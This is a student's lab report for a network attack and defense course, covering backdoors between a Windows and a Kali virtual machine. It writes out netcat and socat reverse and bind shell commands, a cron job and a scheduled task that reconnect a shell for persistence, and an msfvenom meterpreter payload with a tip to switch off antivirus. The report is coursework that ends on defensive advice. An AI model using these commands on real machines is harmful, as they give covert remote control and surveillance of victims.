20154307 《网络对抗技术》实验二 后门原理与实践
一、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:下载盗版软件或者盗版电影的时候。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:linux的cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
答:怎么说,摄屏这个太吊了,我以后要用胶布把这个摄像头堵住。
(4)如何发现自己有系统有没有被安装后门?
答:杀毒软件吧,直接就把后门的程序杀了。
二、实验内容
1.使用netcat获取主机操作Shell,cron启动
(1) Win获得Linux Shell
首先,我们用 ipconfig
查看win的ip地址
用ncat
监听本机(win)的4307
端口
(kali端)用nc kali的ip 端口 -e /bin/sh
反弹连接win
然后,在win端就能进行对linux的操作,例如,ls,或者是看ip地址,也为接下来的实验做铺垫
win端ip:192.168.120.132
kali端ip:192.168.120.129
(2) Linux获得Win Shell
(kali端)敲入nc -l -p 端口号
打开监听
然后(win端)敲入c:\your_nc_dir>ncat.exe -e cmd.exe linux的ip 端口号
,对linux端进行反弹连接
(kali端)输入win的操作即可对win主机进行攻击
(3)使用nc传输数据
win下监听端口4307
(kali端)输入nc linux的ip 端口号
,连接win的端口
效果如下:
2.使用socat获取主机操作Shell, 任务计划启动
在win下监听4307
的端口
回到linux端,通过crontab -e
,选3,进入vim编辑界面,进入插入模式,在最后一行敲入36 * * * * /bin/netcat 192.168.120.132 4307 -e /bin/sh
,即在每个点的36分反弹连接win的4307
端口,当时正好是34分,所以我输入了36,可以很快看到结果。修改后存盘退出
在win端输入linux的命令,一开始命令不会马上出来,到了你设置的时间点以后,命令和执行结果都会马上出来。
效果如下:
3.使用MSF meterpreter 生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
刚开始用socat时,这是啥?做完实验后,哇这个好叼
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr
设置完成后,锁定win用户(win+L),然后进入win,这时该触发器是运行的
在kali下输入socat - tcp:win的ip:端口号
,发现获得了cmd.shell
4.使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
kali端输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口号 -f exe > 20154307_backdoor.exe
,生成后门程序。(注意此时应该管理win的杀毒软件防火墙等)
在win端和linux端分别输入
Win7:ncat.exe -l > 20154307_backdoor.exe
kali:nc win的ip 端口号 < 20154307_backdoor.exe
在Kali上使用msfconsole
指令进入控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
设置完成后,执行监听,打开win上的后门,linux上显示攻击成功
以下是攻击结果
如此一来,课堂上讲完的实验就做完了
实验小结
这次的实验非常有意思,让我也体验了一把当黑客的感觉,后们的攻击实在太厉害了,在学习后门攻击的同时我们也应该学会防范这些攻击,保护好个人隐私,同时,平时用不到的端口该关闭也要关闭,下载软件、电影、音乐的时候还是通过正规渠道比较好,不然黑客下一个攻击的就是你